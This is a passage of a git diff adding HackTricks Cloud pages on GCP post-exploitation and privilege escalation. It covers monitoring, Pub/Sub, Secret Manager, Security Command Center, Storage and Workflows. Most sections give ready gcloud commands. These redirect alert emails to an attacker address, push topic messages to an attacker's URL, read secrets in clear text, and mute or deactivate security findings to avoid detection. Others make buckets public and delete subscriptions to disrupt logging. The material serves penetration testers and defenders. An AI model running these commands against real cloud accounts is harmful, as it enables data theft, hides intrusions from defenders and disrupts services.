+# Delete channel
+gcloud alpha monitoring channels delete <channel>
+```
+
+### `monitoring.notificationChannels.update`
+
+Update labels of a channel to disrupt it:
+
+{% code overflow="wrap" %}
+```bash
+# Delete or update labels, for example email channels have the email indicated here
+gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
+gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md
new file mode 100644
index 0000000000..ea3325a939
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md
@@ -0,0 +1,172 @@
+# GCP - Pub/Sub Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Pub/Sub
+
+For more information about Pub/Sub check the following page:
+
+{% content-ref url="../gcp-services/gcp-pub-sub.md" %}
+[gcp-pub-sub.md](../gcp-services/gcp-pub-sub.md)
+{% endcontent-ref %}
+
+### `pubsub.topics.publish`
+
+Publish a message in a topic, useful to **send unexpected data** and trigger unexpected functionalities or exploit vulnerabilities:
+
+```bash
+# Publish a message in a topic
+gcloud pubsub topics publish <topic_name> --message "Hello!"
+```
+
+### `pubsub.topics.detachSubscription`
+
+Useful to prevent a subscription from receiving messages, maybe to avoid detection.
+
+```bash
+gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>
+```
+
+### `pubsub.topics.delete`
+
+Useful to prevent a subscription from receiving messages, maybe to avoid detection.\
+It's possible to delete a topic even with subscriptions attached to it.
+
+```bash
+gcloud pubsub topics delete <TOPIC NAME>
+```
+
+### `pubsub.topics.update`
+
+Use this permission to update some setting of the topic to disrupt it, like `--clear-schema-settings`, `--message-retention-duration`, `--message-storage-policy-allowed-regions`, `--schema`, `--schema-project`, `--topic-encryption-key`...
+
+### `pubsub.topics.setIamPolicy`
+
+Give yourself permission to perform any of the previous attacks.
+
+### **`pubsub.subscriptions.create,`**`pubsub.topics.attachSubscription` , (`pubsub.subscriptions.consume`)
+
+Get all the messages in a web server:
+
+{% code overflow="wrap" %}
+```bash
+# Crete push subscription and recieve all the messages instantly in your web server
+gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>
+```
+{% endcode %}
+
+Create a subscription and use it to **pull messages**:
+
+```bash
+# This will retrive a non ACKed message (and won't ACK it)
+gcloud pubsub subscriptions create <subscription name> --topic <topic_name>
+
+# You also need pubsub.subscriptions.consume for this
+gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
+## This command will wait for a message to be posted
+```
+
+### `pubsub.subscriptions.delete`
+
+**Delete a subscription** could be useful to disrupt a log processing system or something similar:
+
+```bash
+gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>
+```
+
+### `pubsub.subscriptions.update`
+
+Use this permission to update some setting so messages are stored in a place you can access (URL, Big Query table, Bucket) or just to disrupt it.
+
+{% code overflow="wrap" %}
+```bash
+gcloud pubsub subscriptions update --push-endpoint <your URL> <subscription-name>
+```
+{% endcode %}
+
+### `pubsub.subscriptions.setIamPolicy`
+
+Give yourself the permissions needed to perform any of the previously commented attacks.
+
+### `pubsub.schemas.attach`, `pubsub.topics.update`,(`pubsub.schemas.create`)
+
+Attack a schema to a topic so the messages doesn't fulfil it and therefore the topic is disrupted.\
+If there aren't any schemas you might need to create one.
+
+{% code title="schema.json" %}
+```json
+{
+    "namespace": "com.example",
+    "type": "record",
+    "name": "Person",
+    "fields": [
+        {
+            "name": "name",
+            "type": "string"
+        },
+        {
+            "name": "age",
+            "type": "int"
+        }
+    ]
+}
+```
+{% endcode %}
+
+```bash
+# Attach new schema
+gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
+    --schema=projects/<project-name>/schemas/<topic-id> \
+    --message-encoding=json
+```
+
+### `pubsub.schemas.delete`
+
+This might look like deleting a schema you will be able to send messages that doesn't fulfil with the schema. However, as the schema will be deleted no message will actually enter inside the topic. So this is **USELESS**:
+
+```bash
+gcloud pubsub schemas delete <SCHEMA NAME>
+```
+
+### `pubsub.schemas.setIamPolicy`
+
+Give yourself the permissions needed to perform any of the previously commented attacks.
+
+### `pubsub.snapshots.create`, `pubsub.snapshots.seek`
+
+This is will create a snapshot of all the unACKed messages and put them back to the subscription. Not very useful for an attacker but here it's:
+
+```bash
+gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
+    --subscription=YOUR_SUBSCRIPTION_NAME
+gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
+    --snapshot=YOUR_SNAPSHOT_NAME
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md
new file mode 100644
index 0000000000..d6be15c5f5
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md
@@ -0,0 +1,48 @@
+# GCP - Secretmanager Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Secretmanager
+
+For more information about Secret Manager check:
+
+{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %}
+[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md)
+{% endcontent-ref %}
+
+### `secretmanager.versions.access`
+
+This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):
+
+```bash
+# Get clear-text of version 1 of secret: "<secret name>"
+gcloud secrets versions access 1 --secret="<secret_name>"
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md
new file mode 100644
index 0000000000..745566afae
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md
@@ -0,0 +1,94 @@
+# GCP - Security Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Security
+
+For more information check:
+
+{% content-ref url="../gcp-services/gcp-security-enum.md" %}
+[gcp-security-enum.md](../gcp-services/gcp-security-enum.md)
+{% endcontent-ref %}
+
+### `securitycenter.muteconfigs.create`
+
+Prevent generation of findings that could detect an attacker by creating a `muteconfig`:
+
+{% code overflow="wrap" %}
+```bash
+# Create Muteconfig
+gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
+```
+{% endcode %}
+
+### `securitycenter.muteconfigs.update`
+
+Prevent generation of findings that could detect an attacker by updating a `muteconfig`:
+
+{% code overflow="wrap" %}
+```bash
+# Update Muteconfig
+gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
+```
+{% endcode %}
+
+### `securitycenter.findings.bulkMuteUpdate`
+
+Mute findings based on a filer:
+
+{% code overflow="wrap" %}
+```bash
+# Mute based on a filter
+gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\""
+```
+{% endcode %}
+
+A muted finding won't appear in the SCC dashboard and reports.
+
+### `securitycenter.findings.setMute`
+
+Mute findings based on source, findings...
+
+{% code overflow="wrap" %}
+```bash
+gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED
+```
+{% endcode %}
+
+### `securitycenter.findings.update`
+
+Update a finding to indicate erroneous information:
+
+{% code overflow="wrap" %}
+```bash
+gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md
new file mode 100644
index 0000000000..8f1ee13173
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md
@@ -0,0 +1,60 @@
+# GCP - Storage Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Storage
+
+For more information about CLoud Storage check this page:
+
+{% content-ref url="../gcp-services/gcp-storage-enum.md" %}
+[gcp-storage-enum.md](../gcp-services/gcp-storage-enum.md)
+{% endcontent-ref %}
+
+### Give Public Access
+
+It's possible to give external users (logged in GCP or not) access to buckets content. However, by default bucket will have disabled the option to expose publicly a bucket:
+
+```bash
+# Disable public prevention
+gcloud storage buckets update gs://BUCKET_NAME --no-public-access-prevention
+
+# Make all objects in a bucket public
+gcloud storage buckets add-iam-policy-binding gs://BUCKET_NAME --member=allUsers --role=roles/storage.objectViewer
+## I don't think you can make specific objects public just with IAM
+
+# Make a bucket or object public (via ACL)
+gcloud storage buckets update gs://BUCKET_NAME --add-acl-grant=entity=AllUsers,role=READER
+gcloud storage objects update gs://BUCKET_NAME/OBJECT_NAME --add-acl-grant=entity=AllUsers,role=READER
+```
+
+If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access`
+
+To access open buckets via browser, access the URL `https://<bucket_name>.storage.googleapis.com/` or `https://<bucket_name>.storage.googleapis.com/<object_name>`
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md
new file mode 100644
index 0000000000..af354beb0c
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md
@@ -0,0 +1,47 @@
+# GCP - Workflows Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Workflow
+
+Basic information:
+
+{% content-ref url="../gcp-services/gcp-workflows-enum.md" %}
+[gcp-workflows-enum.md](../gcp-services/gcp-workflows-enum.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+The post exploitation techniques are actually the same ones as the ones shared in the Workflows Privesc section:
+
+{% content-ref url="../gcp-privilege-escalation/gcp-workflows-privesc.md" %}
+[gcp-workflows-privesc.md](../gcp-privilege-escalation/gcp-workflows-privesc.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
new file mode 100644
index 0000000000..7e46a20ba2
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
@@ -0,0 +1,103 @@
+# GCP - Privilege Escalation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Introduction to GCP Privilege Escalation <a href="#introduction-to-gcp-privilege-escalation" id="introduction-to-gcp-privilege-escalation"></a>
+
+GCP, as any other cloud, have some **principals**: users, groups and service accounts, and some **resources** like compute engine, cloud functions…\
+Then, via roles, **permissions are granted to those principals over the resources**. This is the way to specify the permissions a principal has over a resource in GCP.\
+There are certain permissions that will allow a user to **get even more permissions** on the resource or third party resources, and that’s what is called **privilege escalation** (also, the exploitation the vulnerabilities to get more permissions).
+
+Therefore, I would like to separate GCP privilege escalation techniques in **2 groups**:
+
+* **Privesc to a principal**: This will allow you to **impersonate another principal**, and therefore act like it with all his permissions. e.g.: Abuse _getAccessToken_ to impersonate a service account.
+* **Privesc on the resource**: This will allow you to **get more permissions over the specific resource**. e.g.: you can abuse _setIamPolicy_ permission over cloudfunctions to allow you to trigger the function.
+  * Note that some **resources permissions will also allow you to attach an arbitrary service account** to the resource. This means that you will be able to launch a resource with a SA, get into the resource, and **steal the SA token**. Therefore, this will allow to escalate to a principal via a resource escalation. This has happened in several resources previously, but now it’s less frequent (but can still happen).
+
+Obviously, the most interesting privilege escalation techniques are the ones of the **second group** because it will allow you to **get more privileges outside of the resources you already have** some privileges over. However, note that **escalating in resources** may give you also access to **sensitive information** or even to **other principals** (maybe via reading a secret that contains a token of a SA).
+
+{% hint style="warning" %}
+It's important to note also that in **GCP Service Accounts are both principals and permissions**, so escalating privileges in a SA will allow you to impersonate it also.
+{% endhint %}
+
+{% hint style="info" %}
+The permissions between parenthesis indicate the permissions needed to exploit the vulnerability with `gcloud`. Those might not be needed if exploiting it through the API.
+{% endhint %}
+
+## Permissions for Privilege Escalation Methodology
+
+This is how I **test for specific permissions** to perform specific actions inside GCP.
+
+1. Download the github repo [https://github.com/carlospolop/gcp\_privesc\_scripts](https://github.com/carlospolop/gcp_privesc_scripts)
+2. Add in tests/ the new script
+
+## Bypassing access scopes <a href="#bypassing-access-scopes" id="bypassing-access-scopes"></a>
+
+Tokens of SA leakded from GCP metadata service have **access scopes**. These are **restrictions** on the **permissions** that the token has. For example, if the token has the **`https://www.googleapis.com/auth/cloud-platform`** scope, it will have **full access** to all GCP services. However, if the token has the **`https://www.googleapis.com/auth/cloud-platform.read-only`** scope, it will only have **read-only access** to all GCP services even if the SA has more permissions in IAM.
+
+There is no direct way to bypass these permissions, but you could always try searching for **new credentials** in the compromised host, **find the service key** to generate an OAuth token without restriction or **jump to a different VM less restricted**.
+
+When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has.
+
+The **best way to bypass** this restriction is either to **find new credentials** in the compromised host, to **find the service key to generate an OAuth token** without restriction or to **compromise a different VM with a SA less restricted**.
+
+Check SA with keys generated with:
+
+```bash
+for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do
+    echo "Looking for keys for $i:"
+    gcloud iam service-accounts keys list --iam-account $i
+done
+```
+
+## Privilege Escalation Techniques
+
+The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other service account/users/groups privileges. Chaining escalations until you have admin access over the organization.
+
+{% hint style="warning" %}
+GCP has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**.
+{% endhint %}
+
+**The subpages of this section are ordered by services. You can find on each service different ways to escalate privileges on the services.**
+
+### Abusing GCP to escalate privileges locally
+
+If you are inside a machine in GCP you might be able to abuse permissions to escalate privileges even locally:
+
+{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %}
+[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)
+* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
new file mode 100644
index 0000000000..b8c3adc3a0
--- /dev/null
